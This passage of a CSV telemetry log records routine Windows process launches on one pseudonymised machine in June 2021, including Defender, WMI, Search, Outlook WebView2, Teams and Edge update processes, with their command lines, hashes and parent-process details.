00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:45:21.420515600+00:00,2021-06-23 06:45:40.196446800+00:00,ff155cd5-56d3-4a81-a2bf-7215faba9839,computerpii_0a470890c60768167990033d701e7bd881398861,164208,False,10.7740.19041.1052,False,11540474045171845,,11540474045173914,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,2176,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,0.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+828,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 09:28:14.538470300+00:00,15132,svchost.exe,svchost.exe -k netsvcs -p -s dmwappushservice,PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:28:15.379612300+00:00,2021-06-24 09:28:41.113520200+00:00,d4cfc0a6-f00c-46c5-b367-85e863e98cc1,computerpii_0a470890c60768167990033d701e7bd881398861,178511,False,10.7740.19041.1052,False,11540474045136906,,11540474045177626,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
+829,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 05:11:45.101320600+00:00,6096,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 034E3167-7706-C929-8BAC-D335B15A10EA ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 05:11:45.282759100+00:00,2021-06-23 05:12:55.637558+00:00,00ed4f7f-0840-42aa-b8b5-504c0f76ca86,computerpii_0a470890c60768167990033d701e7bd881398861,163442,False,10.7740.19041.1052,False,11540474045145394,,11540474045173639,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+830,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:30:25.663012900+00:00,13116,WmiPrvSE.exe,wmiprvse.exe -secured -Embedding,PortableExecutable,2020-10-09 20:47:18.396187600+00:00,C:\Windows\System32\wbem\WmiPrvSE.exe,496640,60ff40cfd7fb8fe41ee4fe9ae5fe1c51,2198a7b58bccb758036b969ddae6cc2ece07565e2659a7c541a313a0492231a3,3ea7cc066317ac45f963c2227c4c7c50aa16eb7c,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:30:26.091652100+00:00,2021-06-25 01:31:38.569398600+00:00,f0838b14-c3fd-4fd5-a489-a02cca4b991e,computerpii_0a470890c60768167990033d701e7bd881398861,183456,False,10.7740.19041.1052,False,11540474045136908,,11540474045178761,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,Wmiprvse.exe,Wmiprvse.exe,WMI Provider Host
+831,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:56:40.360040900+00:00,14152,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey BB274B4A-EE94-28E9-8E6C-27D2CD1EE959 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:56:40.832419+00:00,2021-06-23 04:59:07.341897200+00:00,a4401a64-45fd-47d3-a790-b8633b19d6b4,computerpii_0a470890c60768167990033d701e7bd881398861,163386,False,10.7740.19041.1052,False,11540474045145394,,11540474045173593,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+832,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 07:22:40.202651+00:00,14412,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 46C484A2-88FA-9B10-A6F6-CE1B30BDE2AE ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:22:41.085558200+00:00,2021-06-23 07:24:40.573207100+00:00,4271fbb3-00fc-4789-a121-506a09d68f8b,computerpii_0a470890c60768167990033d701e7bd881398861,165127,False,10.7740.19041.1052,False,11540474045145394,,11540474045174112,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+833,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:25:23.526097600+00:00,14588,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320860_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320860 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:25:23.692186400+00:00,2021-06-25 02:27:26.447425300+00:00,b2116295-24c2-4e70-aae5-b8fc147a6ff3,computerpii_0a470890c60768167990033d701e7bd881398861,185459,False,10.7740.19041.1052,False,11540474045144190,,11540474045179071,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+834,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:32:10.256710600+00:00,2236,msedgewebview2.exe,"""msedgewebview2.exe"" --type=gpu-process --field-trial-handle=1960,9610365822643270238,18232588942281330170,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware,msAggressiveCacheTrimming,msSingleSignOnOSForPrimaryAccountIsShared,msWindowsTaskManager --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeCouponsDelayNotification,msAutomaticTabFreeze,msBrowserSettingsSupported,msDesktopRewards,msEdgeAddWebCapturetoCollections,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePDFPopUpVisualImproved,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnableMIPForPDF,msEntityExtraction,msExternalTaskManager,msImplicitSignin,msMIPCrossTenantPdfViewSupport,msOpenSaveAsAwarenessUI,msPasswordBreachDetection,msPdfDigitalSignatureRead,msPdfHighlightMode,msPdfInking,msPdfPopupMarkerRenderer,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfVideoComment,msPriceComparison,msReadAloud,msReadAloudPdf,msRevokeExtensions,msScreenShareWebContentEnabled,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msShoppingTrigger,msShowUXForAADPrtSSOForNonAADProfile,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=39745 --gpu-sub-system-id=161484840 --gpu-revision=2 --gpu-driver-version=27.20.100.8336 --noerrdialogs --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4644 /prefetch:2",PortableExecutable,2021-06-18 23:49:41.395899+00:00,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,2817952,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,a4d59c947dee9940fc64d9f5e5f10ddf,4463f554559d0c542ce3e5268edb35c8877053c17d011cd6571e744da685a19b,ce78d78165d117fd916e2d57108f8c3c644b4c0c,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:30:09.905518700+00:00,13988,msedgewebview2.exe,"""msedgewebview2.exe"" --embedded-browser-webview=1 --webview-exe-name=OUTLOOK.EXE --webview-exe-version=16.0.13801.20738 --user-data-dir=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Outlook\WebView2\EBWebView"" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --disable-popup-blocking --enable-features=msSingleSignOnOSForPrimaryAccountIsShared --internet-explorer-integration=none --js-flags=""--harmony-weak-refs-with-cleanup-some --expose-gc"" --mojo-named-platform-channel-pipe=16176.7000.9808366599939228438",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:32:11.158171400+00:00,2021-06-23 01:33:31.839138200+00:00,6c1db57d-68fd-4553-8dbb-5c5015889e6c,computerpii_0a470890c60768167990033d701e7bd881398861,158767,False,10.7740.19041.1052,False,11540474045172468,,11540474045172482,2021-06-23 01:30:09.905518700+00:00,13988,2021-06-23 01:30:09.905518700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54\msedgewebview2.exe,13988,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\EdgeWebView\Application\91.0.864.54,2817952,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.258955100+00:00,2021-06-23 01:30:10.010967100+00:00,2021-06-18 23:49:41.395899+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2,Microsoft Corporation,Microsoft Edge WebView2,91.0.864.54,msedgewebview2_exe,msedgewebview2.exe,Microsoft Edge WebView2
+835,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:25:37.042783900+00:00,552,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:25:37.078317600+00:00,2021-06-24 11:26:10.590942500+00:00,26656684-f5c2-4d55-9c25-bbb3720e3d1b,computerpii_0a470890c60768167990033d701e7bd881398861,180124,False,10.7740.19041.1052,False,11540474045177893,,11540474045178027,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+836,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:36:24.368079700+00:00,6700,SIHClient.exe,sihclient.exe  /cv G+AgT6zpLEGUBqkrxqTwWA.0.1,PortableExecutable,2021-04-14 01:10:32.937492400+00:00,C:\Windows\System32\SIHClient.exe,361056,fb01bf59d3dcf61f005b1cb038046d2f,8f0d59f251400d5897523658666b7ca2c497f69b034e71e8bd44065de07ae1bf,b15a31de350b8312868f2f2d9ed3973a7c34f9ac,299ea296575ccb9d2c1a779062535d5c,ee44fe14df89c4e5eaf8398f8fb4823fd910c5a94d913653d6b9e831254f6cc2,2497169c13b0ba46a6be8a1fe493b250094079b7,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:35:54.260588700+00:00,13420,upfc.exe,Upfc.exe /launchtype periodic /cv G+AgT6zpLEGUBqkrxqTwWA.0,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:36:24.522712+00:00,2021-06-25 00:38:05.523740800+00:00,7a8c4d42-b285-4d0d-8005-d894b68c769c,computerpii_0a470890c60768167990033d701e7bd881398861,180390,False,10.7740.19041.1052,False,11540474045178101,,11540474045178108,2021-06-25 00:35:54.260588700+00:00,13420,2021-06-25 00:35:54.260588700+00:00,\Device\HarddiskVolume3\Windows\System32\upfc.exe,13420,128,TerminateProcessStartkey,C:\Windows\System32,121392,1973-05-29 11:25:14+00:00,2019-12-07 09:08:33.284887700+00:00,2021-06-25 00:35:54.255481700+00:00,2019-12-07 09:08:33.284887700+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,UPFC,upfc.exe,Updateability From SCM,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,SIH Client,sihclient.exe,SIH Client
+837,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:36:54.145210600+00:00,15004,MicrosoftEdge_X64_91.0.864.59_91.0.864.54.exe,"""MicrosoftEdge_X64_91.0.864.59_91.0.864.54.exe"" --msedge --verbose-logging --do-not-launch-msedge --system-level",PortableExecutable,2021-06-25 00:36:53.440944100+00:00,C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{3A129295-D08C-4B4C-B0CC-6180A7DF14A5}\MicrosoftEdge_X64_91.0.864.59_91.0.864.54.exe,6286736,3f73813504d6baefad1ecb13860c67b1,42eb610efa32a22c11e5dd050fd8d205ddb2084ef364f218ae566cd9364bfda7,057305cde3826a9b63e88a746253637245d457ae,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:36:46.420975300+00:00,1964,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /svc",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:36:54.359633700+00:00,2021-06-25 